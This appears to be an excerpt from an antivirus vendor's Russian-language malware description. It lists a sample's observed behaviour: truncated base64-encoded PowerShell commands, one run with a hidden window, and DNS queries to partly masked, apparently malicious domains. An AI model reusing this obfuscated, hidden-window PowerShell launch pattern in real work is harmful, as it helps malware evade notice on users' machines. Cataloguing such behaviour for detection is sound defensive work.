Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOQA3ADMAMgA5ADgANwA1ADkAOAA9ACcAeABjADcANwAwAHgAMAAwADEAMQA1ADAAJwA7ACQAYgA1ADIANAA5ADgAOQA...
- DNS ASK wi##.#oldseek.com
- DNS ASK ch###tylov.com
- DNS ASK pl#####resproject.org
- DNS ASK pr####tolynx.com
- DNS ASK th######natenutrition.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJAB4ADAAOQA3ADMAMgA5ADgANwA1ADkAOAA9ACcAeABjADcANwAwAHgAMAAwADEAMQA1ADAAJwA7ACQAYgA1ADIANAA5ADgAOQA...' (со скрытым окном)